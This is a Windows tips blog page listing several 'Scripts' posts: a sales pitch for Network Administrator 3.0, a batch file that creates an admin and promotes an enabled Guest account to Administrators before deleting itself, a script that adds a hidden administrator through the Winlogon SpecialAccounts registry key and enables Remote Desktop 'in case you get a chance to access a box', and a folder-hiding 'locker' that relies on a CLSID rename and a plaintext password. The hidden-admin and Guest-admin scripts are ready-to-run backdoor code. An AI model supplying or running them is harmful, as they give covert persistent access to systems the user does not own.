Your best source of information and news about software, windows and hardware on the internet

Vista ARTICLES TOP 50 Spyware Virus Vista SOFT Vista HELP

Scripts

You are currently browsing the articles from MS Windows Vista Compatible Software matching the category Scripts.

Network Administrator 3.0 Beta

Purchase Network Administrator 2.9 for only $99 per administrator (50% off since you are a reader of my blog), and when it is released you will receive 3.0 Free.
Just follow this special link

We have been hard at work building a new version of Network Administrator, and have been taking many suggestions from you.

Here is a screen shot of the main form:

Network Administrator

The first thing we did was make the actions multi-threaded. Currently the system only works on one machine at a time.

Silly as this sounds, it was due to a limitation in the Remote Registry service with threads – We found a way around this problem.

It means you can reboot all of those computers in record time.

Network Administrator Progress

Plugins, Plugins, and Plugins. It seems kind of crazy that we did not do this earlier, but the current version of Network Administrator does not have any plugin system. It makes it difficult to add new actions. In our redesign we have added a fantastic plugin system:

Network Administrator Plugin Selection

Best of all, when you purchase a license, new plugins will be automatically downloaded to you for maximum plugin goodness

IntelliAdmin Update System

What else will you see in the new version? It depends – on you. What plugins would you like to see in 3.0? We will take the top 10 ideas and put them in the final version. Send your ideas to plugins@intelliadmin.com

If you purchase Network Administrator 2.9 today, you will get 3.0 for free. In addition, since you are a valued reader of my blog – you can get it for half price!

Just follow this link

Want to part of the 3.0 beta program? Then Sign up here – We will release our first public beta in about two weeks.

Written by Steve Wiseman on September 2nd, 2009 with no comments.
Read more articles on Scripts and otherSoftware and Beta and Windows.

Want to convert a user account into an Admin?

Want to convert a user account into an Admin?

All you need to do is copy the code below, copy/paste it into Notepad and save it as User2admin.bat on your desktop.

echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Double-click the file to execute or type the above-given code in Command Prompt.

Note: this also creates a net account which is also accessable through nets open port (basically it’s a security leak).

Written by magakos on August 17th, 2008 with no comments.
Read more articles on Scripts and WindowS HackS and All and otherSoftware.

How to make a Hidden Admin Account using bat Script !

Hey guys i have been playing around with bat scripts and i found this small code that will let you create a admin account and hide it from the super admin. so in case you get a chance to access a box with admin status all you have to do is to copy this code to note pad and make the changes and save it as .bat and run it. and then you have your own admin account which is hidden :) {Original Code by Netanelj Credits goes to AgentSmith15 for the Dynamic codes}

@Echo Off

SET /P usr=[Enter new username here:]

SET /P pwd=[Enter new password here:]

:: SET /P takes the user input and puts it into the variable.

echo — Creating New User, “%usr%” with password “%pwd%” –

net user “%usr%” “%pwd%” /add

echo — Adding User to Group Administrator –

net localgroup Administrators %usr% /add

echo — User Is Now Administrator — >>

echo — Hidding User –

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %usr% /t REG_DWORD /d 0 /f

echo — Activating Terminal Service –

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

echo — Activating Terminal Service Done –

SET /P =Press Enter to continue . . .

Exit

Click to continue reading "How to make a Hidden Admin Account using bat Script !"

Written by magakos on July 15th, 2008 with 3 comments.
Read more articles on Scripts and WindowS HackS and All and otherSoftware.

Make any folder invisible with password !!

1-First of all creat “new text document”
Any place in your desktop>Right Click > New Text Document

2- Copy This Code And Past It in The Notebad Which U have Created

Code:

cls
@ECHO OFF
title Folder Locker

if EXIST “Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}” goto UNLOCK

if NOT EXIST Locker goto MDLOCKER

:CONFIRM

echo Are you sure u want to Lock the folder(Y/N)

set/p “cho=>”

if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}”
attrib +h +s “Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%== type your password here goto FAIL
attrib -h -s “Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}”
ren “Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker echo Locker created successfully
goto End
:End

3- Replace These Words In The Code “type your password

With The Folder Password .

4- From File Click On Save As .. Then Save As This Name ” Locker.bat”

U Will C File with The Same Name.

5- Open The File ” Locker.Bat” , Automatically It’s Will Creat THe Folder ” Locker”.

6- When U Open The File ” Locker.Bat ” U Will See A window If U Want To Protect Folder Press ” Y ” Then Enter .
The Folder Disappeared

7- Put Anything U Want To Hide And Protect In The ” Locker” Folder Before U Do TH Previous Step .

8- When U Want To Unlock The Folder Click On ” Locker.Bat” And Enter The Password Then U Will See The Protected Folder.

NOTE :** U Can Rename The Folder Locker With Any Name U Want But U Have To Replace It From The Text Code

Written by magakos on July 3rd, 2008 with 4 comments.
Read more articles on Scripts and WindowS HackS and All and otherSoftware.